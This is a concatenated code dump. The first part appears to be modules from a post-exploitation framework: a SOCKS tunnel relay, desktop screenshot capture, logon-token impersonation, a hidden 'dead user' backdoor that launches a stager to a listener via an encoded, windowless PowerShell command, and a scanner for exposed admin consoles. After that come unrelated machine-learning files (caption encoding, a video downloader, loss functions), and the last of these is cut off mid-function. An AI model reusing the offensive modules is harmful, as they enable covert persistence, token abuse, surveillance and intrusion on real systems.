res = c.socks_handler.handle(c, data)
if not c.socks_handler.auth_handled:
self.logger.warning('SOCKS auth handler failed, expect channel close for {}'.format(c))
msg = Message(mtype=MTYPE_DATA, channel=c.channel_id)
self.tunnel.send_message(msg, data=res)
return True
elif not c.socks_handler.request_handled:
res = c.socks_handler.handle(c, data)
msg = Message(mtype=MTYPE_DATA, channel=c.channel_id)
self.tunnel.send_message(msg, data=res)
if not c.socks_handler.request_handled:
self.logger.warning('SOCKS req handler failed, expect channel close for {}'.format(c))
else:
msg = Message(mtype=MTYPE_CADDR, channel=c.channel_id)
self.tunnel.send_message(msg, data=c.local_peer_addr)
return True
else:
return False
def run(self):
s = socket.socket()
s = ssl.wrap_socket(s)
self.logger.debug('Connecting to {}:{}'.format(*self.transport_addr))
try:
s.connect(self.transport_addr)
except Exception as e:
self.logger.error('Problem connecting to server: {}'.format(e))
else:
self.logger.info('Connected to {}:{}'.format(*self.transport_addr))
self.tunnel = Tunnel(s)
self.monitor_sockets()
self.logger.warning('SOCKS relay is exiting')
def relay_main(tunnel_addr=''):
tunnel_addr = (tunnel_addr.split(':')[0], int(tunnel_addr.split(':')[1]))
relay = SocksRelay(transport_addr=tunnel_addr)
relay.run()
return
relay_main(tunnel_addr='${TUNNEL_ADDR}')
```
#### File: powershell/collection/screenshot.py
```python
from builtins import str
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Get-Screenshot',
'Author': ['@obscuresec', '@harmj0y'],
'Description': ('Takes a screenshot of the current desktop and '
'returns the output as a .PNG.'),
'Background' : False,
'OutputExtension' : 'png',
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-TimedScreenshot.ps1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Ratio' : {
'Description' : "JPEG Compression ratio: 1 to 100.",
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Get-Screenshot
{
param
(
[Parameter(Mandatory = $False)]
[string]
$Ratio
)
Add-Type -Assembly System.Windows.Forms;
$ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen;
$ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height;
$DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject);
$DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size);
$DrawingGraphics.Dispose();
$ms = New-Object System.IO.MemoryStream;
if ($Ratio) {
try {
$iQual = [convert]::ToInt32($Ratio);
} catch {
$iQual=80;
}
if ($iQual -gt 100){
$iQual=100;
} elseif ($iQual -lt 1){
$iQual=1;
}
$encoderParams = New-Object System.Drawing.Imaging.EncoderParameters;
$encoderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $iQual);
$jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq \"JPEG\" }
$ScreenshotObject.save($ms, $jpegCodec, $encoderParams);
} else {
$ScreenshotObject.save($ms, [Drawing.Imaging.ImageFormat]::Png);
}
$ScreenshotObject.Dispose();
[convert]::ToBase64String($ms.ToArray());
}
Get-Screenshot"""
if self.options['Ratio']['Value']:
if self.options['Ratio']['Value']!='0':
self.info['OutputExtension'] = 'jpg'
else:
self.options['Ratio']['Value'] = ''
self.info['OutputExtension'] = 'png'
else:
self.info['OutputExtension'] = 'png'
for option,values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
```
#### File: powershell/credentials/tokens.py
```python
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-TokenManipulation',
'Author': ['@JosephBialek'],
'Description': ("Runs PowerSploit's Invoke-TokenManipulation to "
"enumerate Logon Tokens available and uses "
"them to create new processes. Similar to "
"Incognito's functionality. Note: if you select "
"ImpersonateUser or CreateProcess, you must specify "
"one of Username, ProcessID, Process, or ThreadId."),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'RevToSelf' : {
'Description' : 'Switch. Revert to original token.',
'Required' : False,
'Value' : ''
},
'ShowAll' : {
'Description' : 'Switch. Enumerate all tokens.',
'Required' : False,
'Value' : ''
},
'ImpersonateUser' : {
'Description' : 'Switch. Will impersonate an alternate users logon token in the PowerShell thread.',
'Required' : False,
'Value' : ''
},
'CreateProcess' : {
'Description' : 'Specify a process to create instead of impersonating the user.',
'Required' : False,
'Value' : ''
},
'WhoAmI' : {
'Description' : 'Switch. Displays current credentials.',
'Required' : False,
'Value' : ''
},
'Username' : {
'Description' : 'Username to impersonate token of.',
'Required' : False,
'Value' : ''
},
'ProcessID' : {
'Description' : 'ProcessID to impersonate token of.',
'Required' : False,
'Value' : ''
},
'Process' : {
'Description' : 'Process name to impersonate token of.',
'Required' : False,
'Value' : ''
},
'ThreadId' : {
'Description' : 'Thread to impersonate token of.',
'Required' : False,
'Value' : ''
},
'ProcessArgs' : {
'Description' : 'Arguments for a spawned process.',
'Required' : False,
'Value' : ''
},
'NoUI' : {
'Description' : 'Switch. Use if creating a process which doesn\'t need a UI.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-TokenManipulation.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-TokenManipulation"
if self.options['RevToSelf']['Value'].lower() == "true":
scriptEnd += " -RevToSelf"
elif self.options['WhoAmI']['Value'].lower() == "true":
scriptEnd += " -WhoAmI"
elif self.options['ShowAll']['Value'].lower() == "true":
scriptEnd += " -ShowAll | Out-String"
else:
for option,values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
# try to make the output look nice
if script.endswith("Invoke-TokenManipulation") or script.endswith("-ShowAll"):
scriptEnd += "| Select-Object Domain, Username, ProcessId, IsElevated, TokenType | ft -autosize | Out-String"
else:
scriptEnd += "| Out-String"
if self.options['RevToSelf']['Value'].lower() != "true":
scriptEnd += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"'
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
```
#### File: persistence/powerbreach/deaduser.py
```python
from __future__ import print_function
from builtins import str
from builtins import object
import os
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-DeadUserBackdoor',
'Author': ['@sixdub'],
'Description': ('Backup backdoor for a backdoor user.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://sixdub.net'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description' : 'Output the backdoor to a file instead of tasking to an agent.',
'Required' : False,
'Value' : ''
},
'Timeout' : {
'Description' : 'Time (in seconds) to run the backdoor. Defaults to 0 (run forever).',
'Required' : True,
'Value' : '0'
},
'Sleep' : {
'Description' : 'Time (in seconds) to sleep between checks.',
'Required' : True,
'Value' : '30'
},
'Username' : {
'Description' : 'User account to check for existence.',
'Required' : True,
'Value' : ''
},
'Domain' : {
'Description' : 'Switch. Check the current domain for the user account.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Invoke-DeadUserBackdoor
{
Param(
[Parameter(Mandatory=$False,Position=1)]
[int]$Timeout=0,
[Parameter(Mandatory=$False,Position=2)]
[int] $Sleep=30,
[Parameter(Mandatory=$True,Position=3)]
[string] $Username,
[Parameter(Mandatory=$False,Position=4)]
[switch] $Domain
)
$running=$True
$match =""
$starttime = Get-Date
while($running)
{
if ($Timeout -ne 0 -and ($([DateTime]::Now) -gt $starttime.addseconds($Timeout)))
{
$running=$False
}
if($Domain)
{
$UserSearcher = [adsisearcher]"(&(samAccountType=805306368)(samAccountName=*$UserName*))"
$UserSearcher.PageSize = 1000
$count = @($UserSearcher.FindAll()).Count
if($count -eq 0)
{
Write-Verbose "Domain user $Username not found!"
$match=$True
}
}
else
{
$comp = $env:computername
[ADSI]$server="WinNT://$comp"
$usercheck = $server.children | where{$_.schemaclassname -eq "user" -and $_.name -eq $Username}
if(-not $usercheck)
{
$match=$True
}
}
if($match)
{
REPLACE_LAUNCHER
$running=$False
}
else
{
Start-Sleep -s $Sleep
}
}
}
Invoke-DeadUserBackdoor"""
listenerName = self.options['Listener']['Value']
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print(helpers.color("[!] Invalid listener: " + listenerName))
return ""
else:
# set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False"
# and generate the code
stagerCode = stager.generate()
if stagerCode == "":
return ""
else:
script = script.replace("REPLACE_LAUNCHER", stagerCode)
script = script.encode('ascii', 'ignore')
for option,values in self.options.items():
if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
outFile = self.options['OutFile']['Value']
if outFile != '':
# make the base directory if it doesn't exist
if not os.path.exists(os.path.dirname(outFile)) and os.path.dirname(outFile) != '':
os.makedirs(os.path.dirname(outFile))
f = open(outFile, 'w')
f.write(script)
f.close()
print(helpers.color("[+] PowerBreach deaduser backdoor written to " + outFile))
return ""
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ")
# set up the start-process command so no new windows appears
scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-DeadUserBackdoor started'" % (parts[0], " ".join(parts[1:]))
if obfuscate:
scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand)
return scriptLauncher
```
#### File: situational_awareness/network/find_fruit.py
```python
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Find Fruit',
# list of one or more authors for the module
'Author': ['@424f424f'],
# more verbose multi-line description of the module
'Description': ('Searches for low-hanging web applications.'),
# True if the module needs to run in the background
'Background' : True,
# File extension to save the file as
'OutputExtension' : None,
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': ['CIDR Parser credits to http://bibing.us.es/proyectos/abreproy/12106/fichero/ARCHIVOS%252Fservidor_xmlrpc%252Fcidr.py']
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Target' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'IP Address or CIDR to scan.',
'Required' : True,
'Value' : ''
},
'Port' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The port to scan on.',
'Required' : True,
'Value' : '8080'
},
'SSL' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'True/False to force SSL',
'Required' : False,
'Value' : 'False'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
target = self.options['Target']['Value']
port = self.options['Port']['Value']
ssl = self.options['SSL']['Value']
script = """
import urllib2
import sys
import re
import subprocess
iplist = []
def ip2bin(ip):
b = ""
inQuads = ip.split(".")
outQuads = 4
for q in inQuads:
if q != "":
b += dec2bin(int(q),8)
outQuads -= 1
while outQuads > 0:
b += "00000000"
outQuads -= 1
return b
def dec2bin(n,d=None):
s = ""
while n>0:
if n&1:
s = "1"+s
else:
s = "0"+s
n >>= 1
if d is not None:
while len(s)<d:
s = "0"+s
if s == "": s = "0"
return s
def bin2ip(b):
ip = ""
for i in range(0,len(b),8):
ip += str(int(b[i:i+8],2))+"."
return ip[:-1]
def printCIDR(c):
parts = c.split("/")
baseIP = ip2bin(parts[0])
subnet = int(parts[1])
if subnet == 32:
print bin2ip(baseIP)
else:
ipPrefix = baseIP[:-(32-subnet)]
for i in range(2**(32-subnet)):
iplist.append(bin2ip(ipPrefix+dec2bin(i, (32-subnet))))
return
def validateCIDRBlock(b):
p = re.compile("^([0-9]{1,3}\.){0,3}[0-9]{1,3}(/[0-9]{1,2}){1}$")
if not p.match(b):
print "Error: Invalid CIDR format!"
return False
prefix, subnet = b.split("/")
quads = prefix.split(".")
for q in quads:
if (int(q) < 0) or (int(q) > 255):
print "Error: quad "+str(q)+" wrong size."
return False
if (int(subnet) < 1) or (int(subnet) > 32):
print "Error: subnet "+str(subnet)+" wrong size."
return False
return True
def http_get(url):
req = urllib2.Request(url)
resp = urllib2.urlopen(req, timeout = 1)
code = resp.getcode()
if code == 200:
print url + " returned 200!"
return
def main(ip, port, ssl):
if ssl == True:
http = "https"
elif ssl == False:
http = "http"
VulnLinks = []
if '/' in ip:
printCIDR(ip)
for ip in iplist:
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "jmx-console/")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "web-console/ServerInfo.jsp")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "invoker/JMXInvokerServlet")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "lc/system/console")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "axis2/axis2-admin/")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "manager/html/")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "tomcat/manager/html/")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "wp-admin")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "workorder/FileDownload.jsp")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "ibm/console/logon.jsp?action=OK")
VulnLinks.append(http + '://' + ip + ':' + port + '/' + "data/login")
else:
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'jmx-console/')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'web-console/ServerInfo.jsp')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'invoker/JMXInvokerServlet')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'lc/system/console')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'axis2/axis2-admin/')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'manager/html/')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'tomcat/manager/html/')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'wp-admin')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'workorder/FileDownload.jsp')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'ibm/console/logon.jsp?action=OK')
VulnLinks.append(http + '://' + ip + ':' + port + '/' + 'data/login')
for link in VulnLinks:
while True:
try:
req = urllib2.Request(link)
resp = urllib2.urlopen(req, timeout = 1)
code = resp.getcode()
if code == 200:
print link + " returned 200!"
break
except urllib2.URLError:
break
ip = "%s"
port = str("%s")
ssl = %s
main(ip, port, ssl)
""" %(target, port, ssl)
return script
``` |
{
"source": "JimShu716/Design_Project",
"score": 3
} |
#### File: data_process/Tempuckey/caption_encoder.py
```python
import numpy as np
import string
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
from numpy import argmax
import gensim.models.keyedvectors
from gensim.models import Word2Vec
"""
Function to preprocess the raw caption text into one-hot encodings
feature - raw caption feature
word_dict - dictionary of words to construct one- hot
Return: the processed caption feature
"""
def caption_to_one_hot(feature, word_vocab):
dict_size = word_vocab.__len__()
for i in range(len(feature)):
for j in range(len(feature[i])):
sentence = feature[i][j][1]
sentence = sentence.lower() # to lower case
sentence = sentence.translate(str.maketrans('', '', string.punctuation)) # remove all punctuations
sentence_word = sentence.split()
integer_encoded_sentence = []
for word in sentence_word:
word_integer = word_vocab.__call__(word)
integer_encoded_sentence.append(word_integer)
# print(integer_encoded_sentence)
# ================ Initialize matrix for one hot encoding===========
one_hot_sentence = []
for idx in range(len(integer_encoded_sentence)):
initial_arr = np.zeros(dict_size).tolist()
initial_arr[integer_encoded_sentence[idx]] = 1.0
one_hot_sentence.append(initial_arr)
one_hot_sentence = np.array(one_hot_sentence)
feature[i][j] = one_hot_sentence
return feature
"""
Function to preprocess the raw caption text into one-hot encodings
feature - raw caption feature
word_dict - dictionary of words to construct one- hot
Return: the processed bow feature
"""
def caption_to_bow(feature, word_vocab):
dict_size = word_vocab.__len__()
feature_bow = []
for i in range(len(feature)):
sentence = ""
for j in range(len(feature[i])):
timestamps = feature[i][j][0]
sentence += feature[i][j][1]
# print("sentence is =",sentence)
sentence = sentence.lower() # to lower case
sentence = sentence.translate(str.maketrans('', '', string.punctuation)) # remove all punctuations
sentence_word = sentence.split()
integer_encoded_sentence = []
for word in sentence_word:
word_integer = word_vocab.__call__(word)
if word_integer == -1:
continue
integer_encoded_sentence.append(word_integer)
# print(integer_encoded_sentence)
# ================ Initialize matrix for one hot encoding===========
# one_hot_sentence = []
one_hot_sentence = np.zeros(dict_size).tolist()
for idx in range(len(integer_encoded_sentence)):
one_hot_sentence[integer_encoded_sentence[idx]] = 1.0
# one_hot_sentence.append(initial_arr)
one_hot_sentence = np.array(one_hot_sentence)
feature_bow.append(one_hot_sentence)
return feature_bow
"""
Function to preprocess the data in txt file into word vocabulary
Return: the extracted word vocabulary
"""
def txt_to_vocabulary(file_path):
word_vocab = ""
# print("====== Start processing vocabulary ====")
with open(file_path, 'rb') as reader:
for line in reader:
line = line.decode("utf-8")
cap_id, caption = line.split(' ', 1)
caption = caption.lower() # all to lower case
caption = caption.translate(str.maketrans('', '', string.punctuation)) # remove all punctuations
word_vocab += ""
word_vocab += caption
vocab_result = word_vocab.split()
# ========= Remove duplicates in the vocabulary ========
vocab_set = set()
final_vocab = []
for word in vocab_result:
if word not in vocab_set:
vocab_set.add(word)
final_vocab.append(word)
return final_vocab
"""
Function to preprocess the word vocabulary into word dictionary for one-hot
Return: the word dictionary
"""
def vocab_to_dict(vocabulary):
# print("====== Start constructing dictionary ====")
# integer encode
label_encoder = LabelEncoder()
integer_encoded = label_encoder.fit_transform(vocabulary) # encode labels
integer_encoded_list = integer_encoded.tolist()
# ================ Construct a word dictionary===========
word_dict = {}
for key in vocabulary:
for value in integer_encoded_list:
word_dict[key] = value
integer_encoded_list.remove(value)
break
# print("==== Dictionary Construction Completed =====")
return (word_dict)
"""
Function to generate word embedding by word2vec
feature - feature with raw caption texts
Return: the feature with sentence embeddings
"""
def word2vec_embeddings(feature):
# Load pretrained model
model = gensim.models.KeyedVectors.load_word2vec_format(WORD2VEC_PATH, binary=True, unicode_errors='ignore')
for i in range(len(feature)):
for j in range(len(feature[i])):
timestamps = feature[i][j][0]
sentence = feature[i][j][1]
sentence = sentence.lower() # to lower case
sentence = sentence.translate(str.maketrans('', '', string.punctuation)) # remove all punctuations
sentence_word = sentence.split()
sentence_embeddings = []
# ======== Generate word embeddings and sentence embeddings by pretrained word2vec
for word in sentence_word:
word_embeddings = model[word]
sentence_embeddings.append(word_embeddings)
feature[i][j] = (timestamps, sentence_embeddings)
return feature
def compress_sentences(sentences):
compressed_sentence = ''
start_time = None
end_time = None
for sen in sentences:
if type(sen) == tuple and len(sen) == 2:
compressed_sentence += sen[1] + ' '
if start_time is None:
start_time = sen[0][0]
end_time = sen[0][1]
else:
end_time = sen[0][1]
elif type(sen) == str:
compressed_sentence += sen + ' '
else:
raise RuntimeError
compressed_sentence = compressed_sentence[:-1]
return start_time, end_time, compressed_sentence
class Vocabulary(object):
"""Simple vocabulary wrapper."""
def __init__(self, text_style):
self.word2idx = {}
self.idx2word = {}
self.idx = 0
self.text_style = text_style
def add_word(self, word):
if word not in self.word2idx:
self.word2idx[word] = self.idx
self.idx2word[self.idx] = word
self.idx += 1
def __call__(self, word):
if word not in self.word2idx:
return -1
return self.word2idx[word]
def __len__(self):
return len(self.word2idx)
```
#### File: JimShu716/Design_Project/downloader.py
```python
import json
import argparse
import os
import os.path as osp
import shutil
from tqdm import tqdm
def load_json(file):
with open(file) as json_file:
data = json.load(json_file)
return data
def parseInput():
parser = argparse.ArgumentParser("msr_vtt_downloader")
parser.add_argument('--save_path', type=str, default='./MSR_VTT', help='path to save the videos')
parser.add_argument('--json_file', type=str, default='./videodatainfo_2017.json', help='path to save the json file')
parser.add_argument('--vid', type=int, default=-1, help='download a specific video with a vid. -1 to download all')
parser.add_argument('--cid', type=int, default=-1, help='check caption with an id of cid')
return parser.parse_args()
def download(vid, url, save_path):
name = vid+".mp4"
if osp.exists(osp.join(save_path, name)):
return
os.system("youtube-dl -f mp4 {} >> ./download_log.txt".format(url))
file = [x for x in os.listdir() if '.mp4' in x][0]
os.rename(file, name)
shutil.move(name, osp.join(save_path, name))
def main(config):
if not osp.exists(config.json_file):
raise RuntimeError("INVALID json file: {}".format(config.json_file))
if not osp.exists(config.save_path):
os.mkdir(config.save_path)
json_file = load_json(config.json_file)
videos = json_file['videos']
for video in tqdm(videos):
id = video['id']
vid = video['video_id']
# cat = video['category']
url = video['url']
# st = video['start time']
# ed = video['end time']
# sp = video['split']
# print("id: {}, vid: {}, url: {}".format(id, vid, url))
if id == -1:
download(vid, url, config.save_path)
elif id == config.vid:
download(vid, url, config.save_path)
print("Done")
break
captions = json_file['sentences']
for cap in tqdm(captions):
cap_id = cap['sen_id']
vid = cap['video_id']
cap = cap['caption']
if config.cid == cap_id:
print("Captions {}: {}".format(cap_id, cap))
main(parseInput())
```
#### File: JimShu716/Design_Project/loss.py
```python
import torch
import numpy as np
from torch.autograd import Variable
import torch.nn as nn
def cosine_sim(im, s, t=1):
"""Cosine similarity between all the image and sentence pairs
"""
return im.mm(s.t())
def order_sim(im, s, t=1):
"""Order embeddings similarity measure $max(0, s-im)$
"""
YmX = (s.unsqueeze(1).expand(s.size(0), im.size(0), s.size(1))
- im.unsqueeze(0).expand(s.size(0), im.size(0), s.size(1)))
score = -YmX.clamp(min=0).pow(2).sum(2).sqrt().t()
return score
def euclidean_sim(im, s, t=1):
"""Order embeddings similarity measure $max(0, s-im)$
"""
YmX = (s.unsqueeze(1).expand(s.size(0), im.size(0), s.size(1))
- im.unsqueeze(0).expand(s.size(0), im.size(0), s.size(1)))
score = -YmX.pow(2).sum(2).t()
return score
def exponential_sim(im, s, t=1):
# need to check dimention matching
return torch.exp(cosine_sim(im, s)/t)
class TripletLoss(nn.Module):
"""
triplet ranking loss
"""
def __init__(self, margin=0, measure=False, max_violation=False, cost_style='sum', direction='all'):
super(TripletLoss, self).__init__()
self.margin = margin
self.cost_style = cost_style
self.direction = direction
if measure == 'order':
self.sim = order_sim
elif measure == 'euclidean':
self.sim = euclidean_sim
elif measure == 'exp':
self.sim = exponential_sim
print("Exp")
else:
self.sim = cosine_sim
print("Cosine")
self.max_violation = max_violation
def forward(self, s, im, cap_ids=None):
"""
s.shape = (128, 2048)
im.shape = (128, 2048)
"""
# compute image-sentence score matrix
#print("shape of sentence: {}\nshape of image: {}".format(s.shape, im.shape))
scores = self.sim(im, s)
# after sim: scores.shape = (128, 128)
#print("shape of scores: {}".format(scores.shape))
# get the diagonal of the similiarty matrix
diagonal = scores.diag().view(im.size(0), 1)
# diagonal.shape = (128, 1)
# Guess: scores[i][i] = pos score? Indeed.
# TODO: Change the contrastive loss w.r.t this logic
d1 = diagonal.expand_as(scores)
d2 = diagonal.t().expand_as(scores)
# clear diagonals
mask = torch.eye(scores.size(0)) > .5
# generate a binary matrix with the diagonal is True while the rest is False
I = Variable(mask)
if torch.cuda.is_available():
I = I.cuda()
cost_s = None
cost_im = None
# compare every diagonal score to scores in its column
if self.direction in ['i2t', 'all']:
# caption retrieval
cost_s = (self.margin + scores - d1).clamp(min=0)
cost_s = cost_s.masked_fill_(I, 0)
# compare every diagonal score to scores in its row
if self.direction in ['t2i', 'all']:
# image retrieval
cost_im = (self.margin + scores - d2).clamp(min=0)
cost_im = cost_im.masked_fill_(I, 0)
# keep the maximum violating negative for each query
if self.max_violation:
if cost_s is not None:
cost_s = cost_s.max(1)[0]
if cost_im is not None:
cost_im = cost_im.max(0)[0]
if cost_s is None:
cost_s = Variable(torch.zeros(1)).cuda()
if cost_im is None:
cost_im = Variable(torch.zeros(1)).cuda()
pos_score = 0
neg_score = 0
if self.cost_style == 'sum':
neg_score = cost_s.sum()+cost_im.sum()
pos_score = d1.sum()
else:
neg_score = cost_s.mean()+cost_im.mean()
pos_score = d1.mean()
return neg_score, pos_score, neg_score
class ContrastiveLoss(nn.Module):
def __init__(self, measure='cosine', cost_style='sum', direction='all',temperature = 0.6):
super(ContrastiveLoss, self).__init__()
"""
measure: how to compute similiarity
cost_style: used to decide how to add up sentence and image loss (sum or avg)
direction: 'i2t' image to text retrieval, 't2i' text to image retrieval, 'all': both
"""
print(">"*20)
print("Contrastive Loss Used")
self.cost_style = cost_style
self.direction = direction
self.temperature = temperature
if measure == 'order':
self.sim = order_sim
elif measure == 'euclidean':
self.sim = euclidean_sim
elif measure == 'exp':
self.sim = exponential_sim
elif measure == 'cosine':
self.sim = cosine_sim
else:
raise NotImplemented
def forward(self, s, im, alpha=0, cap_ids=None):
"""
s: a 2d tensor with a shape of (batch_size, feature_size) Note: for original dual encoder, it is (batch_size, 2048)
im: a 2d tensor with a shape of (batch_size, feature_size) Note: for original dual encoder, it is (batch_size, 2048)
tempurature: used for simliarity
"""
scores = self.sim(im, s, t=self.temperature)
batch_size = scores.shape[0]
mask = np.zeros([batch_size,batch_size])
v_ids = []
if(cap_ids):
#print("--Using cap_ids")
cap_ids = np.array(cap_ids)
v_ids = np.empty(cap_ids.shape, dtype="<U10")#S10 generates b in front
for index in range(cap_ids.shape[0]):
v_ids[index] = cap_ids[index].split("#")[0]
for i in range(cap_ids.shape[0]):
for j in range(cap_ids.shape[0]):
mask[i][j] = np.where(cap_ids[j].split("#")[0]==v_ids[i],1,0)
else:
#if caption ids are not loaded, only positive on the diagonal
np.fill_diagonal(mask, 1)
m_match = torch.from_numpy(mask) == 1
m_cost = torch.from_numpy(mask) == 0
Imatch = Variable(m_match)
Icost = Variable(m_cost)
if torch.cuda.is_available():
Imatch = Imatch.cuda()
Icost = Icost.cuda()
cost_s = None
cost_im = None
match_s = None
match_im = None
# Implement negative sampling here
# TODO !!!
#MAY BE USE A MARGIN????
#if self.neg_sampling == 'all':
if self.direction in ['i2t', 'all']:
# caption retrieval
cost_s = scores.clamp(min=0)
# print("COST_S",cost_s)
cost_s = cost_s.masked_fill_(Imatch, 0)
match_s = scores.clamp(min=0)
match_s = match_s.masked_fill_(Icost, 0)
if self.direction in ['t2i', 'all']:
# image retrieval
